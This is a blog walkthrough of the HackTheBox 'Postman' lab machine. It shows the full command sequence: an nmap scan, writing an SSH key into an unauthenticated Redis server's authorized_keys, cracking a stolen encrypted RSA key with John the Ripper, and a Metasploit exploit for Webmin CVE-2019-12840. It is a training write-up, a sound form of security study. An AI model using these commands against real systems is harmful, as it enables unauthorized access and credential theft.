<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox - Postman | amirr0r</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox - Postman" /><meta name="author" content="amirr0r" /><meta property="og:locale" content="en_US" /><meta name="description" content="Foothold" /><meta property="og:description" content="Foothold" /><link rel="canonical" href="https://amirr0r.github.io/posts/htb-postman/" /><meta property="og:url" content="https://amirr0r.github.io/posts/htb-postman/" /><meta property="og:site_name" content="amirr0r" /><meta property="og:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/Postman.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-01T01:25:15+01:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/Postman.png" /><meta property="twitter:title" content="HackTheBox - Postman" /><meta name="twitter:site" content="@amirr0r_" /><meta name="twitter:creator" content="@amirr0r" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Foothold","headline":"HackTheBox - Postman","dateModified":"2021-01-01T01:25:15+01:00","datePublished":"2021-01-01T01:25:15+01:00","@type":"BlogPosting","image":"https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/Postman.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://amirr0r.github.io/posts/htb-postman/"},"url":"https://amirr0r.github.io/posts/htb-postman/","author":{"@type":"Person","name":"amirr0r"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">amirr0r</a></div><div class="site-subtitle font-italic"></div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/amirr0r" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/amirr0r_" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/amir-barnat/?locale=en_US" target="_blank"> <i class="fab fa-linkedin-in"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox - Postman</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Fri, Jan 1, 2021, 1:25 AM +0100" > Jan 1, 2021 <i class="unloaded">2021-01-01T01:25:15+01:00</i> </span> by <span class="author"> amirr0r </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Fri, Jan 1, 2021, 11:15 PM +0100" > Jan 1, 2021 <i class="unloaded">2021-01-01T23:15:04+01:00</i> </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/Postman.png" class="post-preview-img"><h2 id="foothold">Foothold</h2><h3 id="nmap-scan"><code class="language-plaintext highlighter-rouge">nmap</code> scan</h3><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nmap <span class="nt">-min-rate</span> 5000 <span class="nt">--max-retries</span> 1 <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p-</span> <span class="nt">-oN</span> Postman-full-port-scan.txt 10.10.10.160
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 <span class="o">(</span>RSA<span class="o">)</span>
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp    open  http    Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: The Cyber Geek<span class="s1">'s Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn'</span>t have a title <span class="o">(</span>text/html<span class="p">;</span> <span class="nv">Charset</span><span class="o">=</span>iso-8859-1<span class="o">)</span><span class="nb">.</span>
</pre></table></code></div></div><h3 id="apache2429-port-80">Apache/2.4.29 (port 80)</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/80.png" alt="Apache port 80" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/80-dirb.png" alt="dirb port 80" /></p><h3 id="miniserv-port-10000">Miniserv (port 10000)</h3><p>First we got an error:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/10000-miniserv.png" alt="10000 miniserv error" /></p><p>After adding <code class="language-plaintext highlighter-rouge">10.10.10.160 postman</code> to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> we are redirected to:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/10000-webmin.png" alt="webmin" /></p><p>Thanks to <a href="#nmap-scan">nmap scan</a> we know we’re dealing with version <strong>1.910</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/webmin-searchsploit.png" alt="searchsploit webmin" /></p><p>Unfortunately the metasploit exploit requires credentials.</p><h3 id="redis-409-port-6379">Redis 4.0.9 (port 6379)</h3><p>According to <a href="https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#ssh">hacktricks</a>, redis home directory is often <code class="language-plaintext highlighter-rouge">/var/lib/redis/</code>. Let’s try to have a shell:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre><span class="nv">$ </span>ssh-keygen <span class="nt">-t</span> rsa <span class="nt">-f</span> postman_rsa
<span class="nv">$ </span>redis-cli <span class="nt">-h</span> <span class="nv">$TARGET</span> 
10.10.10.160:6379&gt; config <span class="nb">set dir</span> /var/lib/redis/.ssh/
OK
10.10.10.160:6379&gt; config <span class="nb">set </span>dbfilename <span class="s2">"authorized_keys"</span>
OK
10.10.10.160:6379&gt; save
OK
10.10.10.160:6379&gt; 
<span class="nv">$ </span><span class="nb">cat </span>foo.txt | redis-cli <span class="nt">-h</span> <span class="nv">$TARGET</span> <span class="nt">-x</span> <span class="nb">set </span>crackit
OK
<span class="c"># Don't know why but I had to do it twice</span>
<span class="nv">$ </span>redis-cli <span class="nt">-h</span> <span class="nv">$TARGET</span> 
10.10.10.160:6379&gt; config <span class="nb">set dir</span> /var/lib/redis/.ssh/
OK
10.10.10.160:6379&gt; config <span class="nb">set </span>dbfilename <span class="s2">"authorized_keys"</span>
OK
10.10.10.160:6379&gt; save
OK
10.10.10.160:6379&gt; 
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/shell.png" alt="shell" /></p><h2 id="user-redis">User (redis)</h2><p>If we go to the <code class="language-plaintext highlighter-rouge">/home</code> directory, we see there is a user called Matt.</p><p>I tried to list the files that he owns:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/find_Matt.png" alt="find files owned by Matt" /></p><p>The first file <code class="language-plaintext highlighter-rouge">/opt/id_rsa.bak</code> seems interesting.</p><p>We can see it;s an encrypted RSA key:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nv">$ </span>redis@Postman:/home/Matt<span class="nv">$ </span><span class="nb">cat</span> /opt/id_rsa.bak
<span class="nt">-----BEGIN</span> RSA PRIVATE KEY-----                     
Proc-Type: 4,ENCRYPTED
<span class="c">#...</span>
</pre></table></code></div></div><p>We can transfer it yo our machine usinh <code class="language-plaintext highlighter-rouge">scp</code>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>scp <span class="nt">-i</span> postman_rsa redis@<span class="nv">$TARGET</span>:/opt/id_rsa.bak <span class="nb">.</span> 
</pre></table></code></div></div><p>Then we can convert using <code class="language-plaintext highlighter-rouge">ssh2john</code> and run <strong>JohnTheRipper</strong>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="nv">$ </span>/usr/share/john/ssh2john.py id_rsa.bak <span class="o">&gt;</span> matt_rsa.john
<span class="nv">$ </span>john matt_rsa.john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>SSH <span class="o">[</span>RSA/DSA/EC/OPENSSH <span class="o">(</span>SSH private keys<span class="o">)</span> 32/64]<span class="o">)</span>
Cost 1 <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES]<span class="o">)</span> is 1 <span class="k">for </span>all loaded hashes
Cost 2 <span class="o">(</span>iteration count<span class="o">)</span> is 2 <span class="k">for </span>all loaded hashes
Will run 12 OpenMP threads
Note: This format may emit <span class="nb">false </span>positives, so it will keep trying even after
finding a possible candidate.
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
computer2008     <span class="o">(</span>id_rsa.bak<span class="o">)</span>
1g 0:00:00:04 DONE <span class="o">(</span>2021-01-01 01:03<span class="o">)</span> 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/s  0125457423 ..<span class="k">*</span>7¡Vamos!
Session completed
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">computer2008</code> is the passphrase!</p><h2 id="user-matt">User (Matt)</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa.bak Matt@<span class="nv">$TARGET</span>
Enter passphrase <span class="k">for </span>key <span class="s1">'id_rsa.bak'</span>: 
Connection closed by 10.10.10.160 port 22
</pre></table></code></div></div><p>This did’nt work so I tried:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>redis@Postman:~<span class="nv">$ </span>su Matt
Password: <span class="c"># computer2008</span>
Matt@Postman:/var/lib/redis<span class="nv">$ </span><span class="nb">cd
</span>Matt@Postman:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
99108a54ba44c99889199e3e53fdacfe
</pre></table></code></div></div><p>We can log in to <strong>webmin</strong> using Matt’s credentials:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/webmin.png" alt="webmin" /></p><p>Therefore we can run the metasploit exploit ↓</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/msf-webmin.png" alt="msf-webmin" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/msf.png" alt="msf" /></p><h2 id="root">Root</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/postman/root_flag.png" alt="webmin" /> ___</p><h2 id="useful-links">Useful links</h2><ul><li><a href="https://book.hacktricks.xyz/pentesting/6379-pentesting-redis">6379 - Pentesting Redis</a></li><li><a href="https://cvedetails.com/cve/CVE-2019-12840/">CVE-2019-12840</a></li><li><a href="https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html">Webmin 1910 Package Updates Remote Command Execution</a></li></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox-walkthroughs/'>Hackthebox walkthroughs</a>, <a href='/categories/linux/'>Linux</a>, <a href='/categories/easy/'>Easy</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb-linux-easy/" class="post-tag no-text-decoration" >htb-linux-easy</a> <a href="/tags/redis/" class="post-tag no-text-decoration" >redis</a> <a href="/tags/ssh2john/" class="post-tag no-text-decoration" >ssh2john</a> <a href="/tags/john-the-ripper/" class="post-tag no-text-decoration" >John The Ripper</a> <a href="/tags/miniserv/" class="post-tag no-text-decoration" >miniserv</a> <a href="/tags/webmin/" class="post-tag no-text-decoration" >webmin</a> <a href="/tags/cve-2019-12840/" class="post-tag no-text-decoration" >CVE-2019-12840</a> <a href="/tags/metasploit/" class="post-tag no-text-decoration" >metasploit</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/oscp-prep/" class="post-tag no-text-decoration" >oscp-prep</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox - Postman - amirr0r&url=https://amirr0r.github.io/posts/htb-postman/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox - Postman - amirr0r&u=https://amirr0r.github.io/posts/htb-postman/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox - Postman - amirr0r&url=https://amirr0r.github.io/posts/htb-postman/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/crto-review/">CRTO Review (Certified Red Team Operator) & Notion Templates</a></li><li><a href="/posts/htb-forest/">HackTheBox - Forest</a></li><li><a href="/posts/oscp-review/">OSCP Review (Cheat Sheet, Tmux Enumeration Scripts and Notion Templates)</a></li><li><a href="/posts/oscp-prep/">How do I prepare for the OSCP?</a></li><li><a href="/posts/htb-valentine/">HackTheBox - Valentine</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-traverxec/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 2, 2021 <i class="unloaded">2021-01-02T16:37:46+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Traverxec</h3><div class="text-muted small"><p> Foothold nmap scan 1 2 3 4 5 6 7 8 9 10 11 12 13 $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Traverxec-full-port-scan.txt 10.10.10.165 Nmap scan report for 10.10.10.165 Host is up (0.10...</p></div></div></a></div><div class="card"> <a href="/posts/htb-openadmin/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Jan 1, 2021 <i class="unloaded">2021-01-01T23:21:04+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - OpenAdmin</h3><div class="text-muted small"><p> Foothold nmap scan 1 2 3 4 5 6 7 8 9 10 11 $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN OpenAdmin-full-port-scan.txt 10.10.10.171 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSS...</p></div></div></a></div><div class="card"> <a href="/posts/htb-lame/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 21, 2020 <i class="unloaded">2020-12-21T21:50:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Lame</h3><div class="text-muted small"><p> Foothold Nmap scan (open ports) FTP We can log in as anonymous: But there are no interesting files… Let’s check what we can enumerate on the other ports ! Samba I couldn’t get anything 